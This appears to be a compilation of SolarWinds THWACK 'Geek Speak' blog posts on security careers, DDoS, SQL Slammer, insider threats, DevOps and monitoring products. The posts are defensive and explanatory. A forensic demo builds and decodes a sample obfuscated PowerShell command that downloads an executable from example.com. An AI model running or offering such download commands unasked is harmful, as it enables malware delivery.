Geek Speak

For a long time, there has been a certain isolation between the network engineer and the security guy. The security guy is nice to have around because when all else fails, you can blame the firewall. That’s right: the network is fine, but you have to talk to the security guy. The security guy won’t tell you much. Why? Because in security you’re on a need-to-know basis, and you don’t need to know.

 

Alas, the point of this blog post is not to discuss the network and security silos and the way we point fingers at different departments. This is, in part, because there’s a shift that's been happening for some time now. Network engineers have been turning into security engineers. I think there are a few reasons for this shift. Let me explain.

 

Networking People Might Be Worried About Their Jobs

For the past several years, the fundamentals of networking as a career have shifted. In times past, the network engineer role dealt with racking and cabling equipment, drawing complex diagrams of the network, configuring various features and protocols via the command line, and testing and monitoring the network. With the advent of Software Defined Networking (SDN) and Network Function Virtualization (NFV), these tasks are quickly disappearing. There’s not much to physically connect now (at least not as much as before), and the network is building itself dynamically through the use of software tools, controllers, and so on.

 

Security Has Some Exciting Aspects that Challenge Network Engineers

It’s true that security elements like a firewall and an IPS can be set up using a controller, and that there’s a lot that software can do. However, there’s a forensic element to network security that adds excitement and may be appealing to network engineers. As network automation takes hold, network engineers are taking up coding in languages like Python, and learning these languages actually helps in the transition to security. Decoding the activity of a would-be attacker, figuring out what their script does, and putting a stop to it is a mind exercise that appeals to network engineers.
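
To make that concrete, here is a toy example of the kind of quick forensic scripting this involves (my own sketch, not from the post): unwrapping a Base64-obfuscated command of the sort attackers use to hide what they’re running. The payload is invented for illustration.

    import base64

    # Stand-in for a captured, obfuscated command line (hypothetical payload).
    # Real PowerShell -EncodedCommand payloads are UTF-16LE; this toy uses
    # UTF-8 for brevity.
    payload = "invoke-webrequest http://example.com/x.exe"
    captured = "powershell -enc " + base64.b64encode(payload.encode()).decode()

    # The analyst's side: pull out the encoded blob and decode it to see
    # what the command was actually trying to do.
    encoded = captured.split()[-1]
    decoded = base64.b64decode(encoded).decode("utf-8", errors="replace")
    print(decoded)  # -> invoke-webrequest http://example.com/x.exe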

 

Security Certifications Look Good on a Resume

Another part of the appeal is that employers are looking for cybersecurity professionals, and there’s money in that work. Forbes said that there were 1 million cybersecurity jobs available in 2016. Information Week says that intrusion detection, secure software development, risk mitigation, cloud security, network monitoring and access management, security analysis, and data security skills are all in high demand. Putting these certifications on a resume increases your chances of landing a high-paying job in the security space.

 

So How Do I Keep Up?

It is true that it's hard to keep up these days. In this series of articles, I’ll tackle some areas that I think are helpful in breaking into the cybersecurity space as a network engineer. In the next article, I'll look at the mound of security certifications that are available and discuss which ones are of most value. After that, we will dive into the world of security in the social space. Believe it or not, there’s a large segment of security professionals who don’t engage in social communities like Twitter and Facebook. We’ll talk about why, and highlight some of the more vocal security folks out there. Then, in our fourth post, I'll cover Cisco’s annual security report and why you should care to read it. Finally, we’ll wrap up the series by discussing the transition into a security role and where to go from there.

 

I look forward to the comments and perhaps even questions that I can address in these future articles. Until then, happy labbing!

This week's Actuator is coming to you from Darmstadt, Germany, where I am attending SQL Konferenz. I had one session yesterday and will be delivering another one tomorrow. So, there's still time to make your way over to Darmstadt and talk data with me and datachick.

 

As always, here's a bunch of links I found on the Intertubz that you may find interesting. Enjoy!

 

How to Spot Visualization Lies

Because people, and statistics, can sometimes stretch the truth, articles like this are a good reminder for everyone to ask questions about their data.

 

Zuckerberg shows off Oculus gloves for typing in VR

Including this because the real point is buried at the bottom: "Oculus will close 200 of its 500 demo stations inside Best Buy stores, after some stations went days without use." Maybe Oculus should focus on why people have lost interest in their product. I'm guessing it wasn't because they needed gloves.

 

Visual Studio 2017 Arrives On March 7

A big milestone for Microsoft is right around the corner. I can recall opening Visual Studio for the first time to create some ASP.NET applications. Can't believe it's been 20 years.

 

A rash of invisible, fileless malware is infecting banks around the globe

Oh, joy. Hey, maybe we'll get lucky and it will add money to our accounts.

 

Who's watching who? Vizio caught spying, FTC says

I am someone who doesn't mind the collection of anonymous data in an effort to make products and services better for customers. But what Vizio did here was awful. Not only was this done without consent, but the data was not anonymous, and Vizio made money by selling it to other parties. And as I sit here typing this, all I can think about is how Vizio is just the company that got caught; there are likely many more examples out there that we don't know about.

 

Oracle Settlement Puts Focus on Cloud Revenue Claims

I wish I could say I'm shocked that Oracle would resort to such tactics, but then I remembered they once told everyone how their database was "unbreakable," and called SQL Server In-Memory OLTP "vaporware." So yeah, the details of this case aren't that surprising.

 

WordPress Bug Allows Hackers to Alter Website Content

Including this as a warning to anyone out there running WordPress: you should update to the latest build before you get hacked. I noticed a handful of blogs last week had been defaced.

 

One thing I enjoy about visiting Germany is seeing how they solve problems in unique ways:

 


You may be a Network Administrator for a small law office, or a quiet small-town school district, or even a midsize enterprise with three or four offices scattered throughout a relatively small geographical area. Have you ever stopped and wondered if a cyber-attack was something you had to be concerned with? You’re not a high-value target, right? You're not a major financial institution, an ISP, a high-profile cloud service provider, or any other kind of organization that someone would want to target with an attack, so it can’t (or won’t) happen to you, right?

 

Perhaps. You might go your entire career without having experienced the crippling impact of a DDoS attack on your infrastructure, or you might learn the hard way that even the most inconspicuous network can be prone to the ripple effect some of these attacks can generate.

 

"The Internet is a series of tubes..." - the famous quote by former United States Senator Ted Stevens, gave an interesting (if incorrect) laypersons perspective on what the Internet was. What it didn't do was highlight the complexity of the interconnections, and how, despite how enormous it is, everything within it is closely related. Six degrees of the Internet, maybe?

 

The recent attack on Dyn is the perfect example of this. While your network may not have been the actual target of that attack, if you were a Dyn customer, you certainly felt its effects. External services, websites, email, and everything else that relied on Dyn for DNS were only intermittently reachable. Seemingly random websites were reported as down or unreachable. Yet there were no indications of a problem on your own infrastructure: links weren’t saturated, and there was no packet loss or latency to be found.

 

Then the news finally reaches you: maybe a tweet, or someone in a Slack channel posting a link to a report of the problem. The news spreads of an ongoing attack on a major DNS provider...your DNS provider. Now it all makes sense, and now you are officially the victim, albeit indirectly, of a massive DDoS attack.

 

Don't feel too bad. Other victims included Twitter, Spotify, and Reddit, among thousands of others.

 

While you may not be a high-value target, some of the critical services you rely on are, especially as these attacks continue to exploit and target simple services lower down in the stack: things like DNS, FTP, and NTP. Almost all networks rely on these services to some degree, and they are common enough that attacking them can cripple almost anyone, anywhere, anytime, with far-reaching impact.

 

Nobody is safe. (Cue dramatic music)

 

That is a huge flaw in something so intrinsic to our daily lives, both personally and professionally. We rely on our networks and the Internet, and when something so simple can interrupt service, it highlights some major problems with the foundation of what we have built.

 

So, the Internet is broken. Who (or what) is going to fix it?

 

Can it be fixed?

By Joe Kim, SolarWinds Chief Technology Officer

 

In the past, cybersecurity threats were thought to come solely from malicious activity outside an organization, so agencies focused on protecting sensitive information from foreign governments, hackers, and more. Today, however, careless or untrained employees are just as dangerous to network security as malicious threats.

 

In fact, according to the results of SolarWinds' third annual federal Cybersecurity Survey, 48 percent of federal IT pros cited careless or untrained insiders as one of the greatest sources of IT security threats to their agency, making 2016 the third consecutive year (2014-2016) that insider threats topped the list. Most recently, those insiders tied with foreign governments as the greatest security threat for federal agencies. Many security breaches were also reported to have been caused by human error, phishing, and malware.

 

Sources of security threats

                               2014   2015   2016
Careless/untrained insiders     42%    53%    48%
Foreign governments             34%    38%    48%
General hacking community       47%    46%    46%

 

For federal security pros, this means that protecting the network has become much harder. Not only must agencies continue to mitigate threats from foreign governments and hacktivists, but they must also protect the network from agency personnel, which can be a far more unpredictable challenge.

 

Expecting the unexpected

 

User error is nothing new. Federal IT pros have been dealing with this since the first bits passed over the first pulled wires. The challenge is that careless users are not getting any more careful, yet the information and data they can access has become much more personal and, in some cases, critical to the agency mission.

 

What’s the solution? While there is no single answer, federal IT pros have found that a combination of products presents a formidable security barrier. In fact, most respondents to the aforementioned survey said they use an average of five different tools in conjunction to get the job done. Among the most valuable solutions cited were:

 

  • Smart card/common access card
  • Identity and access management
  • Patch management
  • Configuration management
  • Security information and event management (SIEM)
  • Web application management

 

Of these tools, users reported the following three as being particularly effective:

 

  1. Patch management software decreased the time to detect and respond to IT security incidents. Agencies using patch management software are far more likely to detect -- within minutes -- rogue devices, denial of service attacks and unauthorized configuration changes.
  2. Configuration management software also cut response time for security incidents.
  3. SIEM tools helped agencies detect phishing attacks within minutes as well as almost all threats presented within the survey.

 

At the end of the day, federal IT pros understand that users will not change, and threats will continue to escalate. The solution is to evolve agency IT security practices to expect the unexpected and implement the most effective combination of tools to create the strongest security posture possible.

 

Find the full article on Government Computer News.

You shouldn't be running unpatched versions of SQL 2000. That's what you need to know.

 

The vulnerability it exploited was first reported back in 2002, and the SQL Slammer worm caught fire in January of 2003, spreading worldwide. It wasn't much more than a nuisance: it merely propagated itself and brought networks to a crawl. The worm could have done much more damage, considering that many of those same instances had blank 'sa' passwords (by default!).

 

But all of that is in the past. Here's what you need to know about SQL Slammer today.

 

First, this worm infects unpatched SQL 2000 and MSDE instances only. About a week ago, I would have thought that the number of such installs would be quite small. But the recent uptick in Slammer tells me that there are enough of these systems to make Slammer one of the top malware detected at the end of 2016. And a quick search at Shodan shows thousands of public-facing database servers available. And if you want to have some real fun at Shodan®, Ian Trump (phat hobbit) has a suggestion for you.

 

Second, old worms never die; they get saved and re-used every now and then by attackers. Some software vendors get a bit lazy, maybe even have some hubris in thinking they don't need to protect themselves from old attack vectors. Attackers know that vendors can be lazy, so they will routinely try old exploits just to see what they can find. Right now, they are finding a bunch of unsecured instances of SQL 2000. This does beg the question: why? Perhaps they are just poking around in an effort to distract us from something else. Or maybe they are delivering a modified payload we don't know about yet. With so many legacy systems out there, it's hard to tell what the real target is.

 

Third, it's quite possible we are simply seeing IoT devices (or vending machines, maybe POS devices, or remote kiosks in industries like healthcare), which are running older versions of MSDE. Perhaps a vendor thought "hey, I can use this old version of MSDE for free" and shipped a few thousand units in the past year, and now suddenly we see the Slammer attack uptick. This may not be a targeted attack... yet. But it almost certainly has been noticed as a possible attack vector by now.

 

Here's what you can do right now.

 

  1. Stop using old software. Yes, I know that the software works. And it's cheap. It's also less secure than you might think. Slammer is just one of the known holes. Imagine the number of holes we haven't learned about yet.
  2. Patch the software you do have. I know companies like to hold off on patching systems for a period of time, but Microsoft® issued a patch for Slammer a full six months before the attacks really started. There's no excuse for any company to have waited so long to apply the patch.
  3. Read this security bulletin. It's old, but it provides details on the Slammer worm, how it works, and what it can do to your systems.
  4. Review your use of firewalls, ACLs, and default ports. Do everything you can to limit your exposure. Even if you can't upgrade to newer versions of SQL, or patch the one you have, you can use other methods to minimize your risk of a breach (one quick check is sketched below).
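
On that last point, here is a minimal sketch of one such check (my own illustration, not from the original post): probing whether a host answers on UDP 1434, the SQL Server Resolution Service port that Slammer abused. I'm assuming the 0x03 SSRP instance-enumeration request byte here, so verify against the protocol docs before relying on it; and since UDP is connectionless, silence is inconclusive, but any reply means the service is exposed.

    import socket

    def probe_sql_browser(host: str, timeout: float = 2.0) -> bool:
        """Send an SSRP enumeration request to UDP 1434 and wait for a reply."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)
        try:
            sock.sendto(b"\x03", (host, 1434))  # 0x03: unicast instance-enumeration
            data, _ = sock.recvfrom(4096)
            print(f"{host}: UDP 1434 answered ({len(data)} bytes) -- investigate")
            return True
        except socket.timeout:
            print(f"{host}: no answer (filtered, or nothing listening)")
            return False
        finally:
            sock.close()

    probe_sql_browser("192.0.2.10")  # TEST-NET example address; use your own host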

 

Lastly, I will leave you with this thought from Ian in an email exchange we had regarding this post:

 

"It’s no coincidence this attack is taking place, as there recently was exploit code for a Windows® SMB attack; perhaps the return of “The Slammer” is a great way to identify at-risk, legacy systems, which a myriad of unpatched Windows® exploits exist for. It’s unlikely you are running SQL 2000 on Windows® Server 2016—great way to get a nice list of targets if the spread of “The Slammer” has a command and control element identifying who’s been infected."

 

There are a lot of bad actors out there. Don't think your public-facing database server isn't at risk. Any piece of information you provide to a hacker allows them to learn ways to possibly attack someone else.

 

We are all in this together.


Don’t Be an IT Seagull!

Posted by kong.yang Employee Feb 10, 2017

What’s an IT seagull? An IT seagull is a person who swoops into projects, takes a dump on everything, then flies off, leaving the rest of the team to clean up the mess. We all know an IT seagull. They tend to be in management positions. Heck, we might even be guilty of being IT seagulls ourselves every once in a while. So how does one prevent IT seagulls from wreaking havoc on mission-critical projects?

 

First, stick to the data – specifically, time series data that can be correlated to root cause issues. The key to troubleshooting is to quickly surface the single point of truth to eliminate the IT blame game. This effectively nullifies IT seagulls with data that clearly shows and correlates cause and effect.

 

Second, collaboration tends to deter IT seagulls. Being able to share one expert’s point of view with another subject matter expert, giving them specific insight into the problem, is powerful when you are trying to quickly remediate issues across multiple stacks, because it allows decisive action to take place.

 

Third, by focusing on the connected context provided by time series data that cuts across the layers of the entire stack, teams can eliminate the IT seagull’s negative potential, even as they are busy dropping gifts that keep on giving from the skies.

 

Do you know any IT seagulls? Share your stories and how you overcame them in the comments below.

In part one, I outlined the differences between a traditional architecture and a development-oriented one. We’ve seen that these foundational differences call for specific design approaches that can significantly impact the goals of a team, and the approaches the sysadmin takes to support them. What we haven’t addressed are some of the prerequisites and design considerations necessary to facilitate that.

 

Let me note that DevOps as a concept began with operations teams creating tools, in newer scripting and programming languages, centered around helping the facilities and sysadmin groups support the needs of the new IT. Essentially, the question was: “What kinds of applications do we in the infrastructure teams need to better support the organization's IT needs as a whole?” Many years ago, I had the great pleasure of working on a team with the great Nick Weaver (@LynxBat). Nick had an incredible facility for imagining tools that would do just this. For example, if you had a requirement to replicate an object from one data center to another, which could be a simple push/get routine, Nick would tell you that you were doing it wrong. He’d create a little application customized to accomplish the task, verify completion, and probably give you a piece of animation while it was taking place to make you feel like you were actually doing something. Meanwhile, it was Nick’s application, his scripting, that was doing all the heavy lifting.
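
Nick’s actual tools aren’t public, so purely as a sketch of the idea, here is a minimal push-and-verify routine of the kind described above. The paths are hypothetical, and the animation is left as an exercise.

    import hashlib
    import shutil

    def sha256_of(path: str) -> str:
        """Hash a file in chunks so large objects don't exhaust memory."""
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    def replicate(src: str, dst: str) -> None:
        """Copy src to dst, then prove the copy by comparing checksums."""
        shutil.copyfile(src, dst)
        if sha256_of(src) != sha256_of(dst):
            raise IOError(f"checksum mismatch replicating {src} -> {dst}")
        print(f"replicated {src} -> {dst} (verified)")

    replicate("/data/object.bin", "/mnt/remote-dc/object.bin")  # hypothetical paths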

 

I’ll never underestimate the role of the developer, nor have I appreciated it more than in the elegance with which Nick was able to achieve these things. I’ve never pushed myself to develop code, which is probably a major shortfall in my infrastructure career. But boy howdy, do I appreciate the elegance of well-written code. As a result, I’ve always leaned on the abilities of peers with coding skills to create the applications I’ve needed to do my job better.

 

When a sysadmin performs all of their tasks manually, mistakes often get made, no matter how strong the attention to detail. But when the tools are tested and validated, running them should produce the same result across the board. If some new infrastructure element must be included, then of course the code must know about it, but the concept remains.

 

So, in the modern cloud-based, or even cloud-native, world, we need these tools to keep ourselves on top of all the tasks that truly do need to be accomplished. The more we can automate, the more efficient we can be. This means everything from deploying new virtual machines, provisioning storage, and loading applications, to orchestrating the deployment of applications onto cloud-based infrastructures (whether hybrid, on-premises, or public cloud). In many cases, these orchestration frameworks simply didn’t exist before. Being able to actively create the tools that ensure successful deployments has become mission critical.
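
As a sketch of what that automation can look like, here is a hypothetical submit-and-poll deployment script. The controller URL, endpoints, and payload fields are all invented, since every orchestration platform exposes its own API, but the shape is typical.

    import time
    import requests

    API = "https://orchestrator.example.com/api/v1"  # hypothetical controller

    def deploy_vm(name: str, cpus: int, mem_gb: int) -> None:
        """Ask the controller for a new VM, then poll the job until it settles."""
        job = requests.post(f"{API}/vms", json={
            "name": name, "cpus": cpus, "memory_gb": mem_gb,
        }).json()

        # Poll until the controller reports a terminal state
        while True:
            state = requests.get(f"{API}/jobs/{job['id']}").json()["state"]
            if state in ("succeeded", "failed"):
                break
            time.sleep(5)
        print(f"deploy {name}: {state}")

    deploy_vm("web-01", cpus=2, mem_gb=8)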

 

To be sure, entirely new pieces of software are being created to solve these problems as they arise, and many of them are simple to use. But whether you buy something off the shelf or write it yourself, the goal is the same: help the poor sysadmin do the job they want to do as seamlessly and efficiently as possible.

Getting ready to head to Germany and SQL Konferenz next week. This will be the fourth consecutive year for me at SQL Konferenz. I enjoy the event and visiting Darmstadt, home of the European Space Agency. (Canada is a member of the ESA despite not being in Europe, and they say Americans are geographically challenged, but whatevs). This year I will have two sessions. Together with Karen López datachick, we will be offering a full training day session on February 14th titled “Advanced Accidental Database Design for SQL Server." The other session I have is on February 16th and is titled “Upgrading to SQL Server 2016." If you do attend, please stop by and say hello and ask me about the Super Bowl.

 

As always, here's a bunch of links I found on the Intertubz that you may find interesting. Enjoy!

 

Hunting for evidence, Secret Service unlocks phone data with force or finesse

Never mind getting Apple to help unlock a phone; the government can always just take it apart if needed.

 

After a decade of silence, this computer worm is back and researchers don't know why

Ah, memories. I recall when and where I was when I found out Slammer had made its way inside our systems. The classics always find their way back.

 

Just One in Four Banks Confident of Breach Detection

The real number is probably closer to zero than one. And I don't want my bank to just detect a breach, I want them to prevent a breach.

 

The Midlife IT Career Crisis

I found this interesting enough to share with anyone that has 15+ years in IT already and is noticing all the new shiny things being used by those darn kids coming out of college.

 

Compliance as code

This is one of those things that sounds great in theory, but not so great in practice. Humans will always find a way around the rules. Always.

 

Ransomware Freezes Eight Years of Police Evidence

This ransomware business will get worse before it gets better.

 

I'm not saying that the only reason I go to Germany is for the schweinshaxe, but it's near the top of the list:

 


By Joe Kim, SolarWinds Chief Technology Officer

 

There is hardly a government IT pro who has not seen sluggish applications create unhappy users.

 

Because the database is at the heart of every application, when there’s a performance issue, there’s a good chance the database is somehow involved. With database optimization methods—such as identifying database performance issues that impact end-user response times, isolating root cause, showing historical performance trends, and correlating metrics with response time and performance—IT managers can speed application performance for their users.

 

Start with these four database optimization tips:

 

Tip #1: Get visibility into the entire application stack

The days of discrete monitoring tools are over. Today’s government IT pros must have visibility across the entire application stack, or the application delivery chain comprising the application and all the backend IT that supports it (software, middleware, extended infrastructure and especially the database). Visibility across the application stack will help identify performance bottlenecks and improve the end-user experience.

 

Tip #2: See beyond traditional infrastructure dashboards

Many traditional monitoring tools provide a dashboard focused on health and status, typically featuring many hard-to-interpret charts and data. In addition, many of these tools don’t provide enough information to easily diagnose a problem, particularly a performance problem.

 

Tools with wait-time analysis capabilities can help IT pros eliminate guesswork. They trace how an application request executes, step by step, and show which processes and resources the application is waiting on. This type of tool provides a far more actionable view of performance than traditional infrastructure dashboards.

 

Tip #3: Reference historical baselines

Database performance is dynamic. It is critical to be able to compare abnormal performance with expected performance. By establishing historic baselines of application and database performance that look at how applications performed at the same time on the same day last week, the week before that, and so on, it is easier to identify a slight variation before it becomes a larger problem. And, if a variation is identified, it’s much easier to track the code, resource, or configuration change that could be the root cause and solve the problem quickly.
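
As a small illustration of this tip (my own sketch, not a description of any particular product), a baseline check can be as simple as comparing the current sample against the same hour on the same weekday in prior weeks and flagging a large deviation:

    from statistics import mean, stdev

    def is_anomalous(current: float, history: list[float], z_threshold: float = 3.0) -> bool:
        """history: the same metric sampled at this hour/weekday in prior weeks."""
        if len(history) < 2:
            return False  # not enough baseline to judge
        mu, sigma = mean(history), stdev(history)
        if sigma == 0:
            return current != mu
        return abs(current - mu) / sigma > z_threshold

    # e.g., average query response time (ms) at 09:00 on the last six Mondays
    baseline = [120.0, 115.0, 130.0, 118.0, 125.0, 122.0]
    print(is_anomalous(180.0, baseline))  # True -> worth investigating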

 

Tip #4: Align the team

An entire stack of technologies supports today’s complex applications. Despite this, most IT operations teams are organized in silos, with each person or group supporting a different part of the stack. Unfortunately, technology-centric silos encourage finger pointing.

 

A far more effective approach shares a unified view of application performance with the entire team. In fact, a unified view based on wait-time analysis will help ensure that everyone can focus on solving application problems quickly.

 

Remember, every department, group, or function within an agency relies on a database in some way or another. Optimizing database performance will help make users happier across the board.

 

Find the full article on Government Computer News.

In traditional IT, the SysAdmin’s role has been established as supporting the infrastructure in its current dynamic. Our measure of success is being able to consistently stand up architecture in support of new and growing applications, build test/dev environments, and ensure that these are delivered quickly, consistently, and with a level of reliability such that the applications work as designed. Most SysAdmins with whom I’ve interacted have performed their tasks in silos. Network does their job, servers do theirs, and of course storage has its unique responsibility. In many cases, the silos worked at cross purposes, or at minimum, with differing agendas. The rhythms of each group often made it impossible to deliver the infrastructure agility the customer required. However, in many cases, our systems did work as we’d hoped, and all the gears meshed properly to ensure our organization’s goals were accomplished.

 

In an agile, cloud native, devops world, none of these variables can be tolerated. We need to be able to provide the infrastructure to deliver the same agility to our developer community that they deliver to the applications.

 

How are these applications different from the more traditional monolithic applications for which we’ve been providing services for so long? The key here is the concept of containers and microservices. I’ve spoken of these before, but in short, a container environment involves packaging either the entire application stack or discrete portions of it in a way that doesn't necessarily rely on the operating system or platform on which it sits. In this case, the x86 layer is already in place, or can be delivered in generic modes on demand. The application, or portions of it, can be deployed as the developer creates it and, alternately, removed just as simply. Because there is so much less reliance on the virtually deployed physical infrastructure, the compute layer can be located pretty much anywhere: your prod or dev environment on premises, your hybrid cloud provider, or even public cloud infrastructure like Amazon. As long as the security and segmented environment have been configured properly, the functional compute layer and its location are somewhat irrelevant.

 

A container-based environment, which is not exclusively different from a microservices-based one, delivers an application as an entity, but again, rather than relying on a physical or virtual platform and its unique properties, it can sit on any presented compute layer. These technologies, such as Kubernetes, Docker, Photon, Mesosphere, and the like, are maturing, with orchestration layers and delivery methods far friendlier to the administrator than they’ve been in the past.

 

In these cases, however, the application platform being delivered is much different from traditional large corporate apps. An old Lotus Notes implementation, for example, required many layers of infrastructure, and in many cases these types of applications simply don’t lend themselves to a modern architecture. They’re not “cloud native.” This is not to disparage how Notes became relevant to many organizations. But the value of a modern architecture, with its application mobility and flexible data locales, simply doesn't fit the kinds of infrastructure that monolithic architectures like SAP, JD Edwards, and the like required. Of course, these particular applications are solving the cloud issues in different ways, and are still as vital to their organizations as they’ve been in the past.

 

In the following four blog posts, I’ll address the architectural, design, and implementation issues facing the SysAdmin within the new paradigm that cloud native brings to the table. I hope to address the questions you may have, and I hope for as much interaction, clarification, and challenging conversation as possible.

At Tech Field Day 13, we gave everyone a sneak peek at some of the cool features we’ll be launching in March. If you missed the sneak peek, check out the footage below:

 

 

Our PerfStack Product Manager has also provided a detailed blog post on what you can expect from this cool feature. In the near future, look for the other Product Managers to give you more exclusive sneak peeks right here on THWACK.

 

Join the conversation

We are curious to hear more about what you think of PerfStack. After all, we used your requests to build this feature. With that said, I’ve seen several requests in THWACK expressing what you need from an Orion dashboard. I would love to hear from those of you directly in the IT trenches, specifically some ideas on how you would manipulate all this Orion data with PerfStack.

 

Personally, I would use PerfStack to visually correlate the page load times in synthetic transactions as observed by WPM with web server performance data in WPM and network latency from NetPath, and maybe storage performance from SRM to get a better understanding of what drives web server performance and what is likely to become a bottleneck that may impact end user experience if load goes up. But we want to hear from you.

 

If you had access to PerfStack right now, what would you do with it?

What interesting problems could you solve if you could take any monitoring object from any node that you are monitoring with Orion? What problems would you troubleshoot? What interesting use cases can you imagine? Which of the problems you are facing today would it help you solve?

 

Let us know in the comments!

 

In Geek Speak(TM), THWACK(R) MVP Eric Hodeen raised the concern that networks are increasingly becoming vulnerable to outdated network devices like routers and firewalls, and even IoT devices now making their way into the workplace. (See Are Vulnerable Routers and IoT Devices the Achilles Heel of Your Network?) The reason, he writes, is that these devices are powered by lightweight and highly specialized operating systems that are not hardened and don’t always get patched when vulnerabilities are discovered. Eric then goes on to give several recommendations to defend against the risks these devices pose. In closing his article, Eric reminds us that security defenses rest on a combination of technical and procedural controls and that there is a direct correlation between configuration management and security management. He then makes the assertion that “perhaps one of the best security tools in your toolbox is your Network Configuration and Change Management software.” We couldn’t agree more. 

 

It’s for this very reason that Network Configuration Manager (NCM) continues to receive so many industry security awards. In late 2016, SolarWinds(R) NCM received two noteworthy awards for security management.

In November, SC Magazine recognized NCM as a 5-star “Best Buy” for Risk and Policy Management. In recognizing NCM, SC Magazine said:

 

“Simple to deploy, very clean to use, and SolarWinds’ decades of experience with internet-working devices—especially Cisco(R) —really shows.” 

 

  You can read the full article here

 

In December, GSN recognized SolarWinds NCM as the Best Compliance/Vulnerability Assessment Solution as part of its 2016 Homeland Security Award. The GSN Awards are designed to recognize the most innovative and important technologies and strategies from U.S. and international IT and cybersecurity companies, physical security companies, and federal, state, county, and municipal government agencies.

 

You can review all GSN award winners here

 

Network security and compliance is a never-ending job. Bad actors devise new hacks, new software means new vulnerabilities, and network changes bring new security controls. Manually doing everything needed to make your network secure and compliant no longer works. This is where NCM can help you to:

 

  • Standardize configurations based on policy
  • Immediately identify configuration changes
  • Create detailed vulnerability and compliance reports
  • Remediate vulnerabilities and policy violations

 

Using NCM is like having an experienced security engineer on staff.  So don’t just do the work of network security and compliance—automate it using NCM to get more done.  

To learn more or to try NCM for 30 days, please visit the NCM product page.

 

Do you use NCM to improve your network security and compliance?  Share your story below.

Recent news headlines report alarming intrusions into otherwise strong, well-defended networks. How did these incursions happen? Did perpetrators compromise executive laptops or critical servers? No, these highly visible endpoints are too well defended. Instead, hackers targeted low-profile, low-value network components like overlooked network routers, switches, and Internet of Things (IoT) devices.  

 

Why are network and IoT devices becoming the target of choice for skilled hackers? Two reasons. First, vendors do not engineer these devices to rigorously repel intruders. Unlike servers and desktops, the network/IoT device OS is highly specialized, which ironically may make it more difficult to secure. However, vendors do not make the effort to harden these platforms. Second, these devices are out of sight and out of mind. As a result, many of them may be approaching technical obsolescence and are no longer supported.

Many of us remember how the Mirai IoT botnet recently compromised millions of Internet-enabled DVRs, IP cameras, and other consumer devices to launch a massive distributed denial-of-service (DDoS) attack against major DNS providers, "browning out" vast regions of the internet. For many, this attack was simply an inconvenience. However, what if IoT devices or weakly defended routers and switches were compromised in a way that impacted our offices, warehouses, and storefronts? We can easily see how weak devices could be targeted and compromised to disrupt commercial operations. Many companies use outdated routers, switches, and weakly secured IoT devices. So how do we protect ourselves?

 

One solution is to forbid any outside electronics in the workplace, which gets my vote, though I know this is increasingly unrealistic. But “where there is a will, there is a waiver” is a common response I hear. A second solution is to retire old hardware and upgrade firmware containing verified vulnerabilities. Another approach is to design, build, and implement a separate network access scheme to accommodate IoT devices so they do not interfere with corporate network productivity. Once this network is operational, it is the job of the corporate technology engineers and security staff to ensure the devices are used in an appropriate manner. To complement these strategies, it’s helpful to have mature change management processes and a network configuration and change management (NCCM) solution with EOL, vulnerability assessment, and configuration management capabilities.

 

Fortunately, these solutions are straightforward. By using a combination of technical and procedural controls, you can alleviate much of the risk. There is a direct correlation between configuration management and security management. So in reality, one of the best security tools in your toolbox is your network configuration and change management software. Using the right tools and taking deliberate and sensible steps can go a long way to keep your company out of the headlines.

 

About the author

Eric Hodeen is a SolarWinds expert and THWACK MVP with over 20 years’ experience in network engineering, with expertise in network management and operations and in STIG, PCI, and NIST compliance. Eric has designed, implemented, and managed networks for the Department of Defense across the U.S. and Europe. He earned his M.S. in Management of Technology with a specialization in security from the University of Texas at San Antonio and holds numerous certifications, including Cisco CCNA R&S, CCDA, CCNA Security, CCNP Security, Juniper JNCIA/JNCIS, ITIL V2, Security+ CE, and CompTIA CASP.

By the time you read this, I will already be in Austin for Tech Field Day #13 hosted at SolarWinds. I am looking forward to attending my first ever TFD, after having virtually attended some of the previous events. I enjoy learning from the best industry experts and TFD allows for that to happen.

 

As always, here's a bunch of links I found on the Intertubz that you may find interesting. Enjoy!

 

Trump aides' use of encrypted messaging may violate records law

Leave it to our government to decide that encrypting messages somehow means they can't be recorded, despite the fact that industries such as financial services have been tracking encrypted messages for years due to SEC rules.

 

A Quarter of Firms Don’t Know if They’ve Been Breached

That number seems low. I think it's closer to 100%, because even firms that know they have been breached likely have no idea about how many breaches they have suffered.

 

Why security is best in layers

And here's the reason companies have no idea if they have been breached: they don't have the right talent in-house to discover such things. Identifying a breach takes more than just one person—it requires analysis across teams.

 

Microsoft Almost Doubled Azure Cloud Revenue Last Quarter

Articles like this remind me of the so-called "experts" out there a few years back who dismissed the idea that the cloud would ever amount to anything worthwhile. And maybe, for some workloads, it isn't. But there is one thing the cloud is right now, and that's a cash cow.

 

Monday Vision, Daily Outcomes, Friday Reflection for Remote Team Management

A must read for anyone working remotely. I've done a similar weekly report in the past, listing three things I did, three things I want to do next week, and three roadblocks.

 

Why your voice makes you cringe

Listening to me speak is awful. I don't know how anyone does it, TBH, let alone watch me.

 

Should the cloud close the front door to the database?

Why is this even a question? As a host, they MUST protect everyone, including the ill-informed customer. If the host left security up to the customer, the cloud would collapse in days.

 

Booted up in 1993, this server still runs—but not for much longer

If you replace 20% of the hardware components for a server, is it the same server as when it started? Never mind the philosophical question; this is quite a feat. And yes, I did think of Battlestar Galactica, and how the lack of upgrades proved to be the thing that saved it from destruction. I'm hoping they never turn this thing off.

 

A quick image from a flight last week—somewhere over Hoth, apparently:


By Joe Kim, SolarWinds Chief Technology Officer

 

Before last year, I bet you never gave a second thought to Alexander Hamilton. However, a popular musical has brought the United States’ first Secretary of the Treasury to center stage.

 

Hamilton had some really great quotes. Here’s one of my favorites: “Safety from external danger is the most powerful director of national conduct.”

 

Hamilton wasn’t talking about cybersecurity, but his words are nevertheless applicable to the subject. As threats multiply and gain complexity, federal IT professionals are feeling the pressure and must take measures to protect their agencies from external danger.

 

Last year, my company, SolarWinds, issued the results of a cybersecurity report and survey that ascertained the level of concern among federal IT administrators about growing threats. Of the 200 government IT professionals surveyed, forty-four percent cited threat sophistication as the number one reason why agencies are more vulnerable today, while twenty-six percent noted the increased volume of threats as their primary concern.

 

Hamilton would tell you to take the bull by the horns. Agency IT administrators should take a cue from old Alex and adopt ways to address their concerns and fight back against threats.

 

The fight for independence… from bad actors

 

Every successful fight begins with a strategy, and strategies typically begin with budgets. As these budgets continue to tighten, agency personnel must continue to explore the most cost-effective options.

 

